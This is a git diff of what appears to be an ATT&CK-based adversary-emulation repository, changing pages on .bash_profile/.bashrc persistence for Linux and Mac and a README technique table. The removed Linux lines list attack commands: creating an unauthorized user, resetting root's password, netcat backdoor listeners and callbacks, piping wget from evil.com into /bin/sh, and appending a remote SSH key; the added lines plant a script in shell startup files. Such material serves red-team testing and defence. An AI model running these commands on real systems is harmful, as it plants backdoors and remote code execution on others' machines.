diff --git a/Linux/Persistence/bash_profile_and_bashrc.md b/Linux/Persistence/bash_profile_and_bashrc.md index fcf317f5..c09c8a1f 100644 --- a/Linux/Persistence/bash_profile_and_bashrc.md +++ b/Linux/Persistence/bash_profile_and_bashrc.md @@ -2,19 +2,5 @@ MITRE ATT&CK Technique: [T1156](https://attack.mitre.org/wiki/Technique/T1156) -* Adding an unauthorized user (useradd) - * `useradd test && echo test:testpass | chpasswd` -* Changing the password to an existing user (noisy, passwd) - * `echo root:NoLogon | chpasswd` (use nologon as pass word for a tiny bit of obscurity) -* Create a backdoor listener (netcat) - * `nc –nlp 8080` -* Create a backdoor callback (netcat) - * `nc 192.168.0.1 8080` -* Retrieve commands from a C2 server (wget or curl) - * `wget https://evil.com/more/commands.txt | /bin/sh` -* Download additional tools and execute (wget or curl) - * `wget https://evil.com/bad/executeable | /bin/sh` -* Add key to authorized_keys file (paste or get from remote server) - * `echo $(wget https://evil.com/bad/ssh/key.txt) >> ~/.ssh/authotized_keys` -* Set an alias to do additional tasks - * `alias ls='ls –al & '` + echo "/path/to/script.py" >> ~/.bash_profile + echo "/path/to/script.py" >> ~/.bashrc diff --git a/Mac/Persistence/bash_profile_and_bashrc.md b/Mac/Persistence/bash_profile_and_bashrc.md new file mode 100644 index 00000000..c09c8a1f --- /dev/null +++ b/Mac/Persistence/bash_profile_and_bashrc.md @@ -0,0 +1,6 @@ +# .bash_profile and .bashrc + +MITRE ATT&CK Technique: [T1156](https://attack.mitre.org/wiki/Technique/T1156) + + echo "/path/to/script.py" >> ~/.bash_profile + echo "/path/to/script.py" >> ~/.bashrc diff --git a/Mac/README.md b/Mac/README.md index ffc51654..14ae3496 100644 --- a/Mac/README.md +++ b/Mac/README.md @@ -3,7 +3,7 @@ | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Execution | Collection | Exfiltration | Command and Control | |------------------------------|-------------------------------|-------------------------------|----------------------------------------|----------------------------------------|---------------------------------|--------------------------|--------------------------------|-----------------------------------------------|-----------------------------------------| -| .bash_profile and .bashrc | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md ) | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Automated Collection | Automated Exfiltration | Commonly Used Port | +| [].bash_profile and .bashrc](Persistence/bash_profile_and_bashrc.md) | Dylib Hijacking | Binary Padding | [Bash History](Credential_Access/Bash_History.md) | [Account Discovery](Discovery/Account_Discovery.md ) | [AppleScript](Execution/AppleScript.md) | [AppleScript](Execution/AppleScript.md) | Automated Collection | Automated Exfiltration | Commonly Used Port | | [Cron Job](Persistence/Cron_Job.md) | Exploitation of Vulnerability | [Clear Command History](Defense_Evasion/Clear_Command_History.md) | Brute Force | Application Window Discovery | Application Deployment Software | Command-Line Interface | Clipboard Data | Data Compressed | Communication Through Removable Media | <<<<<<< HEAD | Dylib Hijacking | Launch Daemon | Code Signing | Create Account | File and Directory Discovery | Exploitation of Vulnerability | Graphical User Interface | Data Staged | Data Encrypted | Connection Proxy |